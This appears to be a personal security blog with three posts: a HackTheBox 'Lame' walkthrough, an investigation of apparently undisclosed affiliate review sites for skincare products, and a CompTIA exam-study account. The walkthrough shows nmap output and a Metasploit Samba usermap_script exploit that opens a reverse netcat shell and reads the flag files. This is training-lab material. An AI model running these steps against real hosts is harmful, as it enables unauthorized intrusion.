HackTheBox: Lame walkthrough

No, not “a lame walkthrough” but “the walkthrough of the box called Lame.” That came off wrong. Anyhow ….

Yes, hello.

There are several HTB Lame walkthroughs out there — I am documenting these steps so that I can have a reference for future enumerations. Aight, let’s do this.


Lame is a super beginner friendly box, in fact this is my first walkthrough and the first box I ever rooted on HTB.

Time required: 15 minutes if you know what you’re doing, 1 hour if you are going to fumble your way through all this like I did.
You will also need a HTB VIP subscription for this is a retired box, and an attackbox that has nmap and metasploit installed. I am using Kali myself.

Let’s do this.


We shall start off with a basic nmap sweep, output below.
I break it down:
– Pn: Treat all hosts as online — skip host discovery (recommended by HTB)
– A: aggressive. Presently this enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (–traceroute).

kali@kali:~$ nmap -Pn -A
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-26 22:56 EST
Nmap scan report for
Host is up (0.22s latency).
Not shown: 996 filtered ports
21/tcp  open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 2h39m03s, deviation: 3h32m12s, median: 9m00s
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   Computer name: lame
|   NetBIOS computer name: 
|   Domain name: hackthebox.gr
|   FQDN: lame.hackthebox.gr
|_  System time: 2021-01-26T23:05:52-05:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 70.79 seconds

Fancy, eh?
Two things you need to take away from this output:
– Anonymous FTP login allowed
– The Samba version is Samba smbd 3.0.20-Debian


A little detour: I ftp’d into the box as anonymous user. I poked around but I didn’t find anything so eventually I switched up my strategy. At this point I was getting quite frustrated so I did some googling and stumbled upon a hint eventually. Fast forward 30 minutes…

I googled “Samba 3.0.20 Debian” and lo and behold, the first hit is our friends over at Rapid7 describing an exploit. Would you look at that. So I fire up metasploit, and searched for “samba”. Well, who would’ve thought there was an exploit:

sf5 exploit(linux/snmp/awind_snmp_exec) > search samba/usermap_script

Matching Modules

   #  Name                                Disclosure Date  Rank       Check  Description
   -  ----                                ---------------  ----       -----  -----------
   0  exploit/multi/samba/usermap_script  2007-05-14       excellent  No     Samba "username map script" Command Execution

msf5 exploit(linux/snmp/awind_snmp_exec) > use 0
[*] Using configured payload cmd/unix/reverse_netcat
msf5 exploit(multi/samba/usermap_script) > show options

Module options (exploit/multi/samba/usermap_script):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   139              yes       The target port (TCP)

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST      yes       The listen address (an interface may be specified)
   LPORT  4443             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf5 exploit(multi/samba/usermap_script) > set RHOSTS
msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 
[*] Command shell session 6 opened ( -> at 2021-01-27 00:05:46 -0500

Tah-dah! We have a shell. The rest was a walk in the park:

msf5 exploit(multi/samba/usermap_script) > exploit

[*] Started reverse TCP handler on 
[*] Command shell session 7 opened ( -> at 2021-01-27 00:06:51 -0500

find / -name user.txt
cat /home/makis/user.txt
<the user flag>

find / -name root.txt
cat /root/root.txt
<the root flag>

And that’s how you root Lame on HackTheBox.

Bis bald,

Tanceuticals and Skin Drop

This is a brain-dump of what I believe is an online scam of three review sites. But maybe it’s perfectly legal. I don’t know, you tell me. I am just going to write down my findings.

Hi guys,

I stumbled upon a set of review sites that provide scammy “reviews” and steer potential buyers to specific products. I don’t know if this is legal, certainly not ethical, but I also don’t know where to go from here. So, for now, I decided to write a blog post about it.

This one if going to be really long. I am sorry in advance. There is a tl;dr at the end if you want to skip the fluff.

Backstory – the first review site

One day, when I searched for a self-tanner, I stumbled upon a website called SelfTanning.com. A self-tanner is a lotion or mousse that you can wipe on your skin and it makes you look tan for 5-7 days. There are no known side effects, it’s considered safe, and a lot of people do it. The only downside is, some self-tanners smell “ok”, some make you look orange instead of tan, some dry patchy or stain all your clothes. It’s a big market out there, and it’s easy to get lost in it.

Selftanning.com is ran by a nice blonde lady who posts Youtube videos of her reviewing all the self-tanners out there. Exactly what I needed. She considers price, smell, color, how long each application lasts and she even had a page for the top 10 tanners for 2018, then she rates them on a scale of 5. Her top recommendation, Tanceuticals Extra Dark, was available an Amazon. I checked the reviews and bought a bottle for myself.

It worked great! The smell was great, the color was uncannily real, and it lasted for a good 7 days. I was pleased. I used up that bottle and ordered another one. Then, once I used up that one too, I ordered a third one.

The third bottle was runny, watery, and I sent it back to Amazon. I got a refund and ordered another brand that Amazon recommended for me. It wasn’t as good as Tanceuticals, but it was fine, and I’ve been using it ever since.

Three years later

It’s 2020, and I am in search for a good face cream that contains retinol. Without going into too much detail, retinol can be purchased with a prescription, and there are also OTC versions available. It’s one of the few ingredients that are proven to be efficient in keeping your skin in good shape if you continuously use it for years. There are a lot of products out there, and some are better than others. Some are completely useless. It’s a big market out there, and it’s easy to get lost in it.

I google “creams with retinol,” click on the top result: Retinol.com, and immediately get a strange feeling.

Retinol.com and Selftanning.com are the same review sites

But they are not the same. The sites’ structure is the same. They both have hundreds of video reviews, but the reviews are posted by different women. Products are reviewed the same way: price, how well it works, texture and feel. Both have a submenu for the top 10 products for the year.

I watched a few of the videos and they sound … legit. The woman’s tone doesn’t sound scripted, and she makes sense in the details she mentions. But then I notice the dates the videos were published: every 1-7 days.

Now, in case of self-tanning lotions I can see how 7 days are enough to test a product. But with facial creams, you need a good 30-90 days for each test. So these videos are fake. Or are they? She sounds honest and knowledgeable.

Who is sponsoring these sites?

I compared the “top” products on the two review sites and immediately saw an overlap. Three companies products received the highest ratings: Tanceuticals, Skinceuticals, and Skin Drop.

Skin Drop’s self tanner on Selftanning.com
Skin Drop’s retinol cream on Retinol.com

I searched for “Skin Drop” and “Skinceuticals”, and found a third website: Cellulite.com. Another website with the same structure, and same type of reviews by yet another woman. But this time I also noticed something else: the backdrop in some of the videos of Retinol.com and Cellulite.com were the same. I also noticed that over time they rotated some of the “review experts” and hired new ones.

Here are the playlists of each of the review sites on Youtube. They have uploaded hundreds of videos since mid-2015:

They don’t trash other products, but I also don’t believe these are honest reviews. In case of Cellulite creams (which are a complete scam, by the way, Cellulite creams don’t work), you would need to use them for weeks before you see results. And the thing with retinol is, it can be highly irritating to the skin. I am hesitant to even try one, let alone a hundred. What I am trying to say is, these women are very likely not talking about their own experiences, but they make it seem like they are.

About Us

Each of the review sites has an “About” page that contains a picture of one (or more) women who are the Chief Editors and reviewers. Selftanning.com is ran by a group of women. I googled each of the names, but couldn’t find any of the matching name + face combinations.

Selftanning.com’s team
Cellulite.com’s host

Retinol.com is allegedly ran by a Jessica Jones. I did not even bother to attempt to google that name, I knew the results would be saturated with images from the Marvel show. Cellulite.com is ran by a women whose name is Elizabeth Adams. I did try to google her .. couldn’t find anything.

Contact Us

Each site has a “Contact Us” page as well. They recommend that you write them via email, but they also list a mailing address.

Retinol.com’s mailing address
Selftanning.com’s mailing address
Cellulite.com’s mailing address

These addresses look fairly alike, no? Turns out, they are various UPS stores around the greater Phoenix area. I also tried to look at the ICANN’s registrar to find out who do these addresses belong to. They are all registered to and live on godaddy.com’s servers and no other names were provided.

Skin Drop and Tanceuticals

The two companies’ websites look entirely similar, clearly they were built on the same framework. But I also discovered something else on skindrop.com: The Terms of Use page refers to Skin Drop as part of Tanceuticals. In addition, per the “Contact Us” page, both Skin Drop and Tanceuticals are also located in the Greater Phoenix Area. Their addresses are UPS boxes, just like the three review sites’.

Skin Drop’s Terms and Conditions

I pinged all five URL’s. Tanceuticals.com and Skindrop.com came back from the same IP.

ping tanceuticals.com -c 1
PING tanceuticals.com ( 56 data bytes
64 bytes from icmp_seq=0 ttl=55 time=139.663 ms

ping skindrop.com -c 1
PING skindrop.com ( 56 data bytes
64 bytes from icmp_seq=0 ttl=55 time=71.291 ms


  • Selftanning.com, Retinol.com, and Cellulite.com and three sites offering seemingly independent product reviews.
  • The sites’ reviews are detailed, but posted all too often to believe that the reviews are based on real-life experiences.
  • The women posting these reviews seem to be local to the site. Their names (associated with this market) don’t appear anywhere else. In some cases in the past they occasionally switched the reviewers to new women.
  • The three sites’ top recommendations are products from two companies: Tanceuticals and Skin Drop.
  • Tanceuticals and Skin Drop are affiliated with each other.
  • Nowhere on Selftanning.com, Retinol.com, and Cellulite.com is it mentioned that they are affiliated with Tanceuticals on Skin Drop.
  • Selftanning.com, Retinol.com, and Cellulite.com, Skin Drop, and Tanceuticals’ physical addresses are UPS boxes around the Greater Phoenix Area.
  • All five URL’s are registered and hosted on Godaddy.com. Tanceuticals.com and Skindrop.com are on the same server.

In my opinion, at the very least the reviews are dishonest and the top products are purposefully listed to steer potential buyers to two particular sites (which are also affiliated, so, same company). This by itself is not against the law, I believe. But this whole thing feels scammy to me. Maybe some of you can offer some insight.

Zero to OSCP Chapter 1 – CompTIA S+ and N+

Hi guys,

One year ago I decided to switch careers and get into cybersecurity. Don’t get me wrong, I love my DBA career. But maybe I would love a cybersecurity even more, who knows? 

Therefore, today I am going to start a new series on my blog, describing my path from zero to OSCP.

This is chapter one.

If you hate fluff, skip to the conclusions at the end of this post.

Background: I am a fantastic DBA. I love working with SQL Server, and as a result of my new position at CoverMyMeds, I am also becoming quite proficient in Postgres. However, I am one of those “Accidental DBA’s” and I never completed a formal CS education.

Therefore, I recognized that I have gaps in my knowledge that I must fill sooner or later, and I decided to use the CompTIA exams for that: A+, N+, and S+.


In case you are a complete newbie to the topic, here is a link to CompTIA’s A+ page, but this is their beginner certifications and covers basic computer technician concepts: how do internal parts work, how does the BIOS work, how to service a laptop and a computer. I had a good understanding of 70% of the concepts and I didn’t feel the need to sit for this exam. However, I also wanted to get a refresher, so I signed up to Cybrary.it (it’s free) and watched Anthony Harris’s A+ course. Unfortunately since then the course was retired, but Cybrary offers other, updated A+ courses instead.


I purchased Jason Dion’s N+ course on Udemy as well as the six practice exams, bought the CompTIA voucher and signed up for an exam one month out. I then promptly forgot about the whole thing for about 27 days until I got the reminder email. I rescheduled for another month. A month later I got another reminder email, and rescheduled again. And again. Finally I got tired of procrastinating and decided to just go for it.

Two weeks before the exam I started to watch the course on Udemy. The weekend before the exam I finished the course and moved on to the sample tests and promptly failed all of them. However, I noticed that quite a few people on Reddit also mentioned that they passed the exam and never got a passing score on the practice tests. 

Monday morning I successfully passed the test with a fairly low score. But hey, a pass is a pass ;)

For the record, here are my practice test results: 68%, 77%, 80%, 68%.


I did not learn from my previous mistakes, and after scheduling the S+ exam I, again, forgot about it until for about a week before the exam. However, this time the universe decided to play a sick joke on me and there were no dates left for two months out in my area! So, I had no choice but to study for the exam with just 6 days left. I passed. 

I used Jason Dion’s course and practice exams again. I speed-watched the entire course in four days, and each day I took another test to measure my progress. My baseline (pre-course) test was 60%. The practice test results were 62%, 67%, 72%, 78%. A lot of the concepts associated with this course were extremely familiar to me due to the cybersec podcasts I would listen to. For example, I scored 100% on most practice tests in the “Threat, Attacks, Vulnerabilites” module.

The day of the exam I was super unsure if I would pass. I was sweating hard by the end of the exam and barely passed – by a pass is a pass ;)

My personal understanding of CompTIA tests

They are not hard (so far). They are multiple choice questions and they are entirely theoretical. I don’t think they add much value to my career other than a nice little badge on LinkedIn. BUT! They are well-structured and help you organize your study material.

If your goal is to get valid work experience, don’t use the CompTIA exams. 

If your goal is to fill gaps in your knowledge, I would suggest them. If you have a couple $100 dollars to spare, or your employer pays for your continuous education, use them.


  • If you have a basic understanding of IT concepts, you can skip A+.
  • If you like to use online courses for studying, I recommend Jason Dion’s N+ and S+ online courses on Udemy.
  • I also recommend purchasing the practice tests. Some of the questions were verbatim the same.
  • There is always a sale going on on Udemy. Never spend more than $10-12 on a course or practice tests.
  •  I was able to pass these tests without using anything else. Jason Dion’s courses and practice tests together are enough.
  • If you get 70% on the practice exams, you are ready for the real ones. People who pass the real exam don’t always get 85% (passing score) on the test exams.
  • Skip the PBQ’s on the exam. Flag them, then move on to the multiple choice questions, and once you’re done with those you can read and solve the PBQ’s.
  • Flag everything that you are unsure of. After my first round, I flagged about 50% of the questions. Then I went back and reviewed everything I flagged and answered what I could. Sometimes later questions might jog your memory. 
  • Cybrary.it has exam vouchers with 10% off